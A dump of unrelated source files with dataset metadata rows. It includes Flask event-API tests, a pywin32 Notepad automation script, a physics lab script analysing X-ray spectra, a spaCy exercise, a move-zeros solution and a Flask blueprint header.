organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id, start="2030-12-31T14:30:00")
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
expected = create_berlin_date(2030, 12, 31, 14, 30)
event = Event.query.get(event_id)
assert event.date_definitions[0].start == expected
def test_put_referencedEventUpdate_sendsMail(client, seeder, utils, app, mocker):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event_via_api(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
other_user_id = seeder.create_user("[email protected]")
other_admin_unit_id = seeder.create_admin_unit(other_user_id, "Other Crew")
seeder.create_reference(event_id, other_admin_unit_id)
mail_mock = utils.mock_send_mails(mocker)
url = utils.get_url("api_v1_event", id=event_id)
put = create_put(place_id, organizer_id)
put["name"] = "Changed name"
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
utils.assert_send_mail_called(mail_mock, "[email protected]")
def test_put_referencedEventNonDirtyUpdate_doesNotSendMail(
client, seeder, utils, app, mocker
):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event_via_api(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
other_user_id = seeder.create_user("[email protected]")
other_admin_unit_id = seeder.create_admin_unit(other_user_id, "Other Crew")
seeder.create_reference(event_id, other_admin_unit_id)
mail_mock = utils.mock_send_mails(mocker)
url = utils.get_url("api_v1_event", id=event_id)
put = create_put(place_id, organizer_id)
put["name"] = "Name"
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
mail_mock.assert_not_called()
def test_patch(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(url, {"description": "Neu"})
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert event.name == "Name"
assert event.description == "Neu"
def test_patch_startAfterEnd(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(
url,
{
"date_definitions": [
{"start": "2021-02-07T11:00:00.000Z", "end": "2021-02-07T10:59:00.000Z"}
]
},
)
utils.assert_response_bad_request(response)
def test_patch_referencedEventUpdate_sendsMail(client, seeder, utils, app, mocker):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event_via_api(admin_unit_id)
other_user_id = seeder.create_user("[email protected]")
other_admin_unit_id = seeder.create_admin_unit(other_user_id, "Other Crew")
seeder.create_reference(event_id, other_admin_unit_id)
mail_mock = utils.mock_send_mails(mocker)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(url, {"name": "Changed name"})
utils.assert_response_no_content(response)
utils.assert_send_mail_called(mail_mock, "[email protected]")
def test_patch_photo(client, seeder, utils, app, requests_mock):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
requests_mock.get(
"https://image.com", content=base64.b64decode(seeder.get_default_image_base64())
)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(
url,
{"photo": {"image_url": "https://image.com"}},
)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert event.photo is not None
assert event.photo.encoding_format == "image/png"
def test_patch_photo_copyright(client, db, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
image_id = seeder.upsert_default_image()
seeder.assign_image_to_event(event_id, image_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(
url,
{"photo": {"copyright_text": "Heiner"}},
)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert event.photo.id == image_id
assert event.photo.data is not None
assert event.photo.copyright_text == "Heiner"
def test_patch_photo_delete(client, db, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
image_id = seeder.upsert_default_image()
seeder.assign_image_to_event(event_id, image_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(
url,
{"photo": None},
)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event, Image
event = Event.query.get(event_id)
assert event.photo_id is None
image = Image.query.get(image_id)
assert image is None
def test_delete(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.delete(url)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert event is None
def test_report_mail(client, seeder, utils, app, mocker):
user_id, admin_unit_id = seeder.setup_base(admin=False, log_in=False)
event_id = seeder.create_event(admin_unit_id)
seeder.create_user(email="[email protected]", admin=True)
seeder.create_user(email="[email protected]", admin=False)
mail_mock = utils.mock_send_mails(mocker)
url = utils.get_url("api_v1_event_reports", id=event_id)
response = utils.post_json(
url,
{
"contact_name": "Firstname Lastname",
"contact_email": "[email protected]",
"message": "Diese Veranstaltung wird nicht stattfinden.",
},
)
utils.assert_response_no_content(response)
utils.assert_send_mail_called(
mail_mock,
["[email protected]", "[email protected]"],
[
"Firstname Lastname",
"[email protected]",
"Diese Veranstaltung wird nicht stattfinden.",
],
)
| 35.896254 | 88 | 0.717726 |
c84751c41e478f6c77fd672807e33fc6eb22acec
| 1,906 |
py
|
Python
|
hello/hello_pywin32.py
|
East196/hello-py
|
a77c7a0c8e5e2b5e8cefaf0fda335ab0c3b1da21
|
[
"Apache-2.0"
] | 1 |
2017-10-23T14:58:47.000Z
|
2017-10-23T14:58:47.000Z
|
hello/hello_pywin32.py
|
East196/hello-py
|
a77c7a0c8e5e2b5e8cefaf0fda335ab0c3b1da21
|
[
"Apache-2.0"
] | null | null | null |
hello/hello_pywin32.py
|
East196/hello-py
|
a77c7a0c8e5e2b5e8cefaf0fda335ab0c3b1da21
|
[
"Apache-2.0"
] | 1 |
2018-04-06T07:49:18.000Z
|
2018-04-06T07:49:18.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import win32api
import win32gui
import win32con
print("Hello,world!")
def find_idxSubHandle(pHandle, winClass, index=0):
"""
已知子窗口的窗体类名
寻找第index号个同类型的兄弟窗口
"""
assert type(index) == int and index >= 0
handle = win32gui.FindWindowEx(pHandle, 0, winClass, None)
while index > 0:
handle = win32gui.FindWindowEx(pHandle, handle, winClass, None)
index -= 1
return handle
def find_subHandle(pHandle, winClassList):
"""
递归寻找子窗口的句柄
pHandle是祖父窗口的句柄
winClassList是各个子窗口的class列表,父辈的list-index小于子辈
"""
assert type(winClassList) == list
if len(winClassList) == 1:
return find_idxSubHandle(pHandle, winClassList[0][0], winClassList[0][1])
else:
pHandle = find_idxSubHandle(pHandle, winClassList[0][0], winClassList[0][1])
return find_subHandle(pHandle, winClassList[1:])
"""输出phandle的所有子控件"""
def p_sub_handle(phandle):
handle = -1
while handle != 0:
if handle == -1:
handle = 0
handle = win32gui.FindWindowEx(phandle, handle, None, None)
if handle != 0:
className = win32gui.GetClassName(handle)
print(className)
"""
记事本实例
"""
notepadHhandle = win32gui.FindWindow("Notepad", None)
print(("%x" % (notepadHhandle)))
editHandle = find_subHandle(notepadHhandle, [("Edit", 0)])
print(("%x" % (editHandle)))
"""修改edit中的值"""
win32api.SendMessage(editHandle, win32con.WM_SETTEXT, 0, "666666")
command_dict = { # [目录的编号, 打开的窗口名]
"open": [3, "打开"]
}
"""操作菜单"""
menu = win32gui.GetMenu(notepadHhandle)
menu = win32gui.GetSubMenu(menu, 0)
cmd_ID = win32gui.GetMenuItemID(menu, command_dict["open"][0])
if cmd_ID == -1:
print("没有找到相应的菜单")
else:
print(("菜单id:%x" % (cmd_ID)))
win32gui.PostMessage(notepadHhandle, win32con.WM_COMMAND, cmd_ID, 0)
| 25.078947 | 84 | 0.641133 |
23f19c07ee75091be23abf40007b89cc7a6aeb40
| 17,291 |
py
|
Python
|
AP_SS16/602/PythonSkript.py
|
DimensionalScoop/kautschuk
|
90403f97cd60b9716cb6a06668196891d5d96578
|
[
"MIT"
] | 3 |
2016-04-27T17:07:00.000Z
|
2022-02-02T15:43:15.000Z
|
AP_SS16/602/PythonSkript.py
|
DimensionalScoop/kautschuk
|
90403f97cd60b9716cb6a06668196891d5d96578
|
[
"MIT"
] | 5 |
2016-04-27T17:10:03.000Z
|
2017-06-20T14:54:20.000Z
|
AP_SS16/602/PythonSkript.py
|
DimensionalScoop/kautschuk
|
90403f97cd60b9716cb6a06668196891d5d96578
|
[
"MIT"
] | null | null | null |
##################################################### Import system libraries ######################################################
import matplotlib as mpl
mpl.rcdefaults()
mpl.rcParams.update(mpl.rc_params_from_file('meine-matplotlibrc'))
import matplotlib.pyplot as plt
import numpy as np
import scipy.constants as const
import uncertainties.unumpy as unp
from uncertainties import ufloat
from uncertainties.unumpy import (
nominal_values as noms,
std_devs as stds,
)
################################################ Finish importing system libraries #################################################
################################################ Adding subfolder to system's path #################################################
import os, sys, inspect
# realpath() will make your script run, even if you symlink it :)
cmd_folder = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile( inspect.currentframe() ))[0]))
if cmd_folder not in sys.path:
sys.path.insert(0, cmd_folder)
# use this if you want to include modules from a subfolder
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"python_custom_scripts")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
############################################# Finish adding subfolder to system's path #############################################
##################################################### Import custom libraries ######################################################
from curve_fit import ucurve_fit
from table import (
make_table,
make_full_table,
make_composed_table,
make_SI,
write,
)
from regression import (
reg_linear,
reg_quadratic,
reg_cubic
)
from error_calculation import(
MeanError
)
################################################ Finish importing custom libraries #################################################
import math
from scipy.interpolate import UnivariateSpline
# Planck
h = 4.135667516e-15 # eV second
# vacuum velo of light
c = 299792458 # metre per second
# diffraction distance
d = 201.4e-12 # metre
#elementary charge
e = 1.6e-19#coulomb
#Rydbergonstante
r = 13.6 #eV
#sommerfeldsche Feinstrukturkonstante
s_k = 7.29e-3
zwei_theta, impulsrate = np.genfromtxt('messdaten/1_Messung_werte.txt', unpack=True)
write('build/Tabelle_messung_1.tex', make_table([zwei_theta,impulsrate],[1, 0])) # Jeder fehlerbehaftete Wert bekommt zwei Spalten
write('build/Tabelle_messung_1_texformat.tex', make_full_table(
'Messdaten Bragg Bedingung.',
'table:A2',
'build/Tabelle_messung_1.tex',
[], # Hier aufpassen: diese Zahlen bezeichnen diejenigen resultierenden Spaltennummern,
# die Multicolumns sein sollen
[
r'$\theta \:/\: \si{\degree}$',
r'$Zaehlrate$']))
theta, Z = np.loadtxt("messdaten/Bremsberg_werte.txt", unpack=True)
theta = theta/2
plt.xlabel(r'$\theta \:/\: \si{\degree}$')
plt.ylabel(r'$Impulsrate \:/\: \si{\kilo\gram\meter\per\second\tothe{2}}$')
# plt.xlabel(r'$t \:/\: \si{\milli\second}$')
#plt.title("Emissionsspektrum einer Cu-Anode bei 35 kV")
plt.grid()
plt.xticks()
plt.yticks()
plt.annotate(r'$K_\alpha$', xy=(46.5/2, 6499))
plt.annotate(r'$K_\beta$', xy=(41.5/2, 2000))
plt.annotate(r'Bremsberg', xy=(20/2, 750))
plt.plot(theta, Z,'b-', label='Interpolation')
plt.legend(loc='best')
plt.savefig("build/cu-emission.pdf")
plt.close()
# print("hallo")
# #np.arcsin(0.5)
# print(np.arcsin(1))
# print(np.sin(90))
# import math
# print("try")
# print(math.sin(90))
# print(math.cos(math.radians(1)))
####Grenzwinkel-Bestimmung####
print("Ergebniss")
#lamb1 = math.sin(math.radians(5.4)) * 2* 201.4*10**(-12)
lamb_min = 2*d*np.sin(np.deg2rad(5.4))
E_max = h*c/lamb_min
write('build/lambda_min.tex', make_SI(lamb_min*1e12, r'\pico\meter', figures=2)) # type in Anz. signifikanter Stellen
write('build/E_max.tex', make_SI(E_max*1e-3, r'\kilo\electronvolt', figures=2)) # type in Anz. signifikanter Stellen
####Halbwertsbreite####
def halbwertsbreite(x, y):
spline = UnivariateSpline(x, y-np.max(y)/2, s=0)
r1, r2 = spline.roots() # find the roots
lambda1 = 2*d*np.sin(np.deg2rad(r1))
lambda2 = 2*d*np.sin(np.deg2rad(r2))
E1 = h*c/lambda1
E2 = h*c/lambda2
DE = E1 - E2
print ('Halbwertswinkel: {0:.5e} deg, {1:.5e} deg'.format(r1, r2))
print ('Halbwertsbreite: {0:.5e}'.format(np.abs(r1-r2)))
print (u'Energieaufloesung: {0:.5e} eV'.format(DE))
xnew = np.linspace(min(x), max(x))
ynew = spline(xnew)
plt.plot(x, y, 'rx', label='Messdaten')
plt.plot(xnew, ynew+np.max(y)/2,'b-', label='Interpolation')
plt.axvline(r1)
plt.axvline(r2)
plt.grid()
plt.legend()
plt.xlabel("doppelter Kristallwinkel in Grad")
plt.ylabel(u"Zählrate")
###############################################################
spline = UnivariateSpline(theta[84:90], Z[84:90]-np.max(Z[84:90])/2, s=0)
r1, r2 = spline.roots() # find the roots
lambda1 = 2*d*np.sin(np.deg2rad(r1))
lambda2 = 2*d*np.sin(np.deg2rad(r2))
E1 = h*c/lambda1
E2 = h*c/lambda2
DE = E1 - E2
print ('Halbwertswinkel: {0:.5e} deg, {1:.5e} deg'.format(r1, r2))
print ('Halbwertsbreite: {0:.5e}'.format(np.abs(r1-r2)))
print (u'Energieaufloesung: {0:.5e} eV'.format(DE))
xnew = np.linspace(min(theta[84:90]), max(theta[84:90]))
ynew = spline(xnew)
plt.plot(theta[84:90], Z[84:90], 'rx', label='Messdaten')
plt.plot(xnew, ynew+np.max(Z[84:90])/2,'b-', label='Interpolation')
plt.axvline(r1)
plt.axvline(r2)
plt.grid()
plt.legend(loc='best')
# plt.xlabel("doppelter Kristallwinkel in Grad")
# plt.ylabel(u"Zählrate")
plt.xlabel(r'$\theta \:/\: \si{\degree}$')
plt.ylabel(r'$Impulsrate \:/\: \si{\kilo\gram\meter\per\second\tothe{2}}$')
write('build/Halbwertswinkel_beta_1.tex', make_SI(r1, r'\degree', figures=2))
write('build/Halbwertswinkel_beta_2.tex', make_SI(r2, r'\degree', figures=2))
write('build/Halbwertsbreite_beta.tex', make_SI(np.abs(r1-r2), r'\degree', figures=2))
write('build/Energieaufloesung_beta.tex', make_SI(DE*1e-3, r'\kilo\electronvolt', figures=2))
plt.savefig("build/halbwertsbreiten_beta.pdf")
plt.close()
#halbwertsbreite(theta[96:101], Z[96:101])
spline = UnivariateSpline(theta[96:101], Z[96:101]-np.max(Z[96:101])/2, s=0)
r1, r2 = spline.roots() # find the roots
lambda1 = 2*d*np.sin(np.deg2rad(r1))
lambda2 = 2*d*np.sin(np.deg2rad(r2))
E1 = h*c/lambda1
E2 = h*c/lambda2
DE = E1 - E2
print ('Halbwertswinkel: {0:.5e} deg, {1:.5e} deg'.format(r1, r2))
print ('Halbwertsbreite: {0:.5e}'.format(np.abs(r1-r2)))
print (u'Energieaufloesung: {0:.5e} eV'.format(DE))
xnew = np.linspace(min(theta[96:101]), max(theta[96:101]))
ynew = spline(xnew)
plt.plot(theta[96:101], Z[96:101], 'rx', label='Messdaten')
plt.plot(xnew, ynew+np.max(Z[96:101])/2,'b-', label='Interpolation')
plt.axvline(r1)
plt.axvline(r2)
plt.grid()
plt.legend(loc='best')
plt.xlabel(r'$\theta \:/\: \si{\degree}$')
plt.ylabel(r'$Impulsrate \:/\: \si{\kilo\gram\meter\per\second\tothe{2}}$')
write('build/Halbwertswinkel_alpha_1.tex', make_SI(r1, r'\degree', figures=2))
write('build/Halbwertswinkel_alpha_2.tex', make_SI(r2, r'\degree', figures=2))
write('build/Halbwertsbreite_alpha.tex', make_SI(np.abs(r1-r2), r'\degree', figures=2))
write('build/Energieaufloesung_alpha.tex', make_SI(DE*1e-3, r'\kilo\electronvolt', figures=2))
write('build/Absorptionsenergie_Kupfer.tex', make_SI(E1*1e-3, r' ', figures=2))
plt.savefig("build/halbwertsbreiten_alpha.pdf")
plt.close()
##################### Abschirmkonstante
theta_alpha = 47.2/2
theta_beta = 42.8/2
write('build/theta_alpha.tex', make_SI(theta_alpha, r'\degree', figures=2))
write('build/theta_beta.tex', make_SI(theta_beta, r'\degree', figures=2))
lambda_alpha = 2*d*np.sin(np.deg2rad(theta_alpha))
lambda_beta = 2*d*np.sin(np.deg2rad(theta_beta))
E_alpha = h*c/lambda_alpha
E_beta = h*c/lambda_beta
sigma_1 = 29 - np.sqrt(E_beta/r)
sigma_2 = 29 -2* np.sqrt((r*((29-sigma_1)**2) - E_alpha)/r)
write('build/sigma_1.tex', make_SI(sigma_1, r' ', figures=2))
write('build/sigma_2.tex', make_SI(sigma_2, r' ', figures=2))
##Literaturwerte
sigma_1_lit = 29 - np.sqrt(8903/r)
sigma_2_lit = 29 -2* np.sqrt((r*((29-sigma_1)**2) - 8046)/r)
write('build/sigma_1_lit.tex', make_SI(sigma_1_lit, r' ', figures=2))
write('build/sigma_2_lit.tex', make_SI(sigma_2_lit, r' ', figures=2))
#write('build/Energiedifferenz.tex', make_SI(6268-1919, r'\electronvolt', figures=2)) # abgelesen
#######################
# Das Absorptionsspektrum, Graphiken
## Germanium
plt.clf
theta_ger, Z_ger = np.genfromtxt('messdaten/Germanium.txt', unpack=True)
theta_ger = theta_ger/2
# plt.plot(theta_ger, Z_ger)
plt.xlabel(r'$\theta \:/\: \si{\degree}$')
plt.ylabel(r'$Impulsrate \:/\: \si{\kilo\gram\meter\per\second\tothe{2}}$')
plt.grid()
# plt.xticks()
# plt.yticks()
plt.plot(theta_ger, Z_ger,'b-', label='Messdaten')
plt.legend(loc='best')
plt.savefig("build/Germanium.pdf")
plt.close()
## Zink
theta_zink, Z_zink = np.genfromtxt('messdaten/Zink.txt', unpack=True)
theta_zink = theta_zink/2
plt.xlabel(r'$\theta \:/\: \si{\degree}$')
plt.ylabel(r'$Impulsrate \:/\: \si{\kilo\gram\meter\per\second\tothe{2}}$')
plt.grid()
plt.xticks()
plt.yticks()
plt.plot(theta_zink, Z_zink,'b-', label='Messdaten')
plt.legend(loc='best')
plt.savefig("build/Zink.pdf")
plt.close()
##Zirkonium
theta_zir, Z_zir = np.genfromtxt('messdaten/Zirkonium.txt', unpack=True)
theta_zir = theta_zir/2
plt.xlabel(r'$\theta \:/\: \si{\degree}$')
plt.ylabel(r'$Impulsrate \:/\: \si{\kilo\gram\meter\per\second\tothe{2}}$')
plt.grid()
plt.xticks()
plt.yticks()
plt.plot(theta_zir, Z_zir,'b-', label='Messdaten')
plt.legend(loc='best')
plt.savefig("build/Zirkonium.pdf")
plt.close()
##Gold
theta_gold, Z_gold = np.genfromtxt('messdaten/Gold.txt', unpack=True)
theta_gold = theta_gold/2
plt.xlabel(r'$\theta \:/\: \si{\degree}$')
plt.ylabel(r'$Impulsrate \:/\: \si{\kilo\gram\meter\per\second\tothe{2}}$')
plt.grid()
plt.xticks()
plt.yticks()
plt.plot(theta_gold, Z_gold,'b-', label='Messdaten')
plt.legend(loc='best')
plt.savefig("build/Gold.pdf")
plt.close()
#### Energiebestimmung
def Grade(x_1, y_1, x_2, y_2):
m = (y_2-y_1)/(x_2-x_1)
b = y_1 - m*x_1
y = (y_2 + y_1)/2
x = (y-b)/m
return x
##Germanium
theta_ger_x = Grade(theta_ger[32], Z_ger[32], theta_ger[35], Z_ger[35])
lambda_ger = 2*d*np.sin(np.deg2rad(theta_ger_x))
E_ger = h*c/lambda_ger
write('build/Absorptionsenergie_Germanium.tex', make_SI(E_ger*1e-3, r'\kilo\electronvolt', figures=2))
write('build/Absorptionsenergie_Germanium_ohne.tex', make_SI(E_ger*1e-3, r' ', figures=2))
##Zink
theta_zink_x = Grade(theta_zink[30], Z_zink[30], theta_zink[35], Z_zink[35])
lambda_zink = 2*d*np.sin(np.deg2rad(theta_zink_x))
E_zink = h*c/lambda_zink
write('build/Absorptionsenergie_Zink.tex', make_SI(E_zink*1e-3, r'\kilo\electronvolt', figures=2))
write('build/Absorptionsenergie_Zink_ohne.tex', make_SI(E_zink*1e-3, r' ', figures=2))
##Zirkonium
theta_zir_x = Grade(theta_zir[23], Z_zir[23], theta_zir[27], Z_zir[27])
lambda_zir = 2*d*np.sin(np.deg2rad(theta_zir_x))
E_zir = h*c/lambda_zir
write('build/Absorptionsenergie_Zirkonium.tex', make_SI(E_zir*1e-3, r'\kilo\electronvolt', figures=2))
write('build/Absorptionsenergie_Zirkonium_ohne.tex', make_SI(E_zir*1e-3, r' ', figures=2))
#### Bestimmung der Abschirmkonstante
sigma_ger = 32 - np.sqrt((E_ger/r) -((s_k**2)/4)*32**4)
sigma_zink = 30 - np.sqrt((E_zink/r) -((s_k**2)/4)*30**4)
sigma_zir = 40 - np.sqrt((E_zir/r) -((s_k**2)/4)*40**4)
write('build/Abschirmkonstante_Germanium.tex', make_SI(sigma_ger, r' ', figures=2))
write('build/Abschirmkonstante_Zink.tex', make_SI(sigma_zink, r' ', figures=2))
write('build/Abschirmkonstante_Zirkonium.tex', make_SI(sigma_zir, r' ', figures=2))
#Moseley-Diagramm
E_k = (E_zink, E_ger, E_zir)
Z = (30,32,40) # Zn, Ge, Zr
E_k_wurzel = np.sqrt(E_k)
params = ucurve_fit(reg_linear, Z, E_k_wurzel)
m,b = params
write('build/hcRydbergonstante.tex', make_SI(4/3*m**2, r'\electronvolt', figures=1))
write('build/Rydbergonstante.tex', make_SI(4/3*m**2/(h*c), r'\per\meter', figures=1))
plt.clf
t_plot = np.linspace(25,45, 100)
plt.plot(t_plot , reg_linear(t_plot, *noms(params)), 'b-', label='Fit')
plt.plot(Z, E_k_wurzel, 'rx', label='Messdaten')
plt.xlabel(r'Kernladungszahl $Z$')
plt.ylabel(r'$\sqrt{E_\textrm{k} \:/\: \si{\kilo\electronvolt}}$')
plt.legend(loc='best')
plt.savefig("build/Moseley_Diagramm.pdf")
plt.close
################################ FREQUENTLY USED CODE ################################
#
########## IMPORT ##########
# t, U, U_err = np.genfromtxt('data.txt', unpack=True)
# t *= 1e-3
########## ERRORS ##########
# R_unc = ufloat(R[0],R[2])
# U = 1e3 * unp.uarray(U, U_err)
# Rx_mean = np.mean(Rx) # Mittelwert und syst. Fehler
# Rx_mean_err = MeanError(noms(Rx)) # Fehler des Mittelwertes
#
## Relative Fehler zum späteren Vergleich in der Diskussion
# RelFehler_G = (G_mess - G_lit) / G_lit
# RelFehler_B = (B_mess - B_lit) / B_lit
# write('build/RelFehler_G.tex', make_SI(RelFehler_G*100, r'\percent', figures=1))
# write('build/RelFehler_B.tex', make_SI(RelFehler_B*100, r'\percent', figures=1))
########## CURVE FIT ##########
# def f(t, a, b, c, d):
# return a * np.sin(b * t + c) + d
#
# params = ucurve_fit(f, t, U, p0=[1, 1e3, 0, 0]) # p0 bezeichnet die Startwerte der zu fittenden Parameter
# params = ucurve_fit(reg_linear, x, y) # linearer Fit
# params = ucurve_fit(reg_quadratic, x, y) # quadratischer Fit
# params = ucurve_fit(reg_cubic, x, y) # kubischer Fit
# a, b = params
# write('build/parameter_a.tex', make_SI(a * 1e-3, r'\kilo\volt', figures=1)) # type in Anz. signifikanter Stellen
# write('build/parameter_b.tex', make_SI(b * 1e-3, r'\kilo\hertz', figures=2)) # type in Anz. signifikanter Stellen
########## PLOTTING ##########
# plt.clf # clear actual plot before generating a new one
#
## automatically choosing limits with existing array T1
# t_plot = np.linspace(np.amin(T1), np.amax(T1), 100)
# plt.xlim(t_plot[0]-1/np.size(T1)*(t_plot[-1]-t_plot[0]), t_plot[-1]+1/np.size(T1)*(t_plot[-1]-t_plot[0]))
#
## hard coded limits
# t_plot = np.linspace(-0.5, 2 * np.pi + 0.5, 1000) * 1e-3
#
## standard plotting
# plt.plot(t_plot * 1e3, f(t_plot, *noms(params)) * 1e-3, 'b-', label='Fit')
# plt.plot(t * 1e3, U * 1e3, 'rx', label='Messdaten')
## plt.errorbar(B * 1e3, noms(y) * 1e5, fmt='rx', yerr=stds(y) * 1e5, label='Messdaten') # mit Fehlerbalken
## plt.xscale('log') # logarithmische x-Achse
# plt.xlim(t_plot[0] * 1e3, t_plot[-1] * 1e3)
# plt.xlabel(r'$t \:/\: \si{\milli\second}$')
# plt.ylabel(r'$U \:/\: \si{\kilo\volt}$')
# plt.legend(loc='best')
# plt.tight_layout(pad=0, h_pad=1.08, w_pad=1.08)
# plt.savefig('build/aufgabenteil_a_plot.pdf')
########## WRITING TABLES ##########
### IF THERE IS ONLY ONE COLUMN IN A TABLE (workaround):
## a=np.array([Wert_d[0]])
## b=np.array([Rx_mean])
## c=np.array([Rx_mean_err])
## d=np.array([Lx_mean*1e3])
## e=np.array([Lx_mean_err*1e3])
#
# write('build/Tabelle_b.tex', make_table([a,b,c,d,e],[0, 1, 0, 1, 1])) # Jeder fehlerbehaftete Wert bekommt zwei Spalten
# write('build/Tabelle_b_texformat.tex', make_full_table(
# 'Messdaten Kapazitätsmessbrücke.',
# 'table:A2',
# 'build/Tabelle_b.tex',
# [1,2,3,4,5], # Hier aufpassen: diese Zahlen bezeichnen diejenigen resultierenden Spaltennummern,
# # die Multicolumns sein sollen
# ['Wert',
# r'$C_2 \:/\: \si{\nano\farad}$',
# r'$R_2 \:/\: \si{\ohm}$',
# r'$R_3 / R_4$', '$R_x \:/\: \si{\ohm}$',
# r'$C_x \:/\: \si{\nano\farad}$']))
#
## Aufsplitten von Tabellen, falls sie zu lang sind
# t1, t2 = np.array_split(t * 1e3, 2)
# U1, U2 = np.array_split(U * 1e-3, 2)
# write('build/loesung-table.tex', make_table([t1, U1, t2, U2], [3, None, 3, None])) # type in Nachkommastellen
#
## Verschmelzen von Tabellen (nur Rohdaten, Anzahl der Zeilen muss gleich sein)
# write('build/Tabelle_b_composed.tex', make_composed_table(['build/Tabelle_b_teil1.tex','build/Tabelle_b_teil2.tex']))
########## ARRAY FUNCTIONS ##########
# np.arange(2,10) # Erzeugt aufwärts zählendes Array von 2 bis 10
# np.zeros(15) # Erzeugt Array mit 15 Nullen
# np.ones(15) # Erzeugt Array mit 15 Einsen
#
# np.amin(array) # Liefert den kleinsten Wert innerhalb eines Arrays
# np.argmin(array) # Gibt mir den Index des Minimums eines Arrays zurück
# np.amax(array) # Liefert den größten Wert innerhalb eines Arrays
# np.argmax(array) # Gibt mir den Index des Maximums eines Arrays zurück
#
# a1,a2 = np.array_split(array, 2) # Array in zwei Hälften teilen
# np.size(array) # Anzahl der Elemente eines Arrays ermitteln
########## ARRAY INDEXING ##########
# y[n - 1::n] # liefert aus einem Array jeden n-ten Wert als Array
########## DIFFERENT STUFF ##########
# R = const.physical_constants["molar gas constant"] # Array of value, unit, error
| 35.873444 | 148 | 0.636863 |
9b0826525a573c30f78599e5c2771508af5331a2
| 218 |
py
|
Python
|
exercises/ja/exc_02_02_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/ja/exc_02_02_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/ja/exc_02_02_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
from spacy.lang.ja import Japanese
nlp = Japanese()
doc = nlp("私はネコを飼っています")
# 単語「ネコ」のハッシュを引く
cat_hash = ____.____.____[____]
print(cat_hash)
# cat_hashを使って文字列を引く
cat_string = ____.____.____[____]
print(cat_string)
| 16.769231 | 34 | 0.756881 |
f1e59d5569716344616dbf26c5bd9458ed237e7e
| 347 |
py
|
Python
|
lintcode/539-Move-Zeros/MoveZeros.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2015-12-16T04:01:03.000Z
|
2015-12-16T04:01:03.000Z
|
lintcode/539-Move-Zeros/MoveZeros.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2016-02-09T06:00:07.000Z
|
2016-02-09T07:20:13.000Z
|
lintcode/539-Move-Zeros/MoveZeros.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 2 |
2019-06-27T09:07:26.000Z
|
2019-07-01T04:40:13.000Z
|
class Solution:
# @param {int[]} nums an integer array
# @return nothing, do this in-place
def moveZeroes(self, nums):
# Write your code here
i = 0
for j in xrange(len(nums)):
if nums[j]:
num = nums[j]
nums[j] = 0
nums[i] = num
i += 1
| 26.692308 | 42 | 0.446686 |
9e2bb957a798bcb2557b75ebaba83c41c3c3def7
| 1,879 |
py
|
Python
|
projects/api/components.py
|
Matheus158257/projects
|
26a6148046533476e625a872a2950c383aa975a8
|
[
"Apache-2.0"
] | null | null | null |
projects/api/components.py
|
Matheus158257/projects
|
26a6148046533476e625a872a2950c383aa975a8
|
[
"Apache-2.0"
] | null | null | null |
projects/api/components.py
|
Matheus158257/projects
|
26a6148046533476e625a872a2950c383aa975a8
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Components blueprint."""
from flask import jsonify, request
from flask_smorest import Blueprint
from ..controllers.components import create_component, get_component, update_component, \
delete_component, pagination_components, total_rows_components
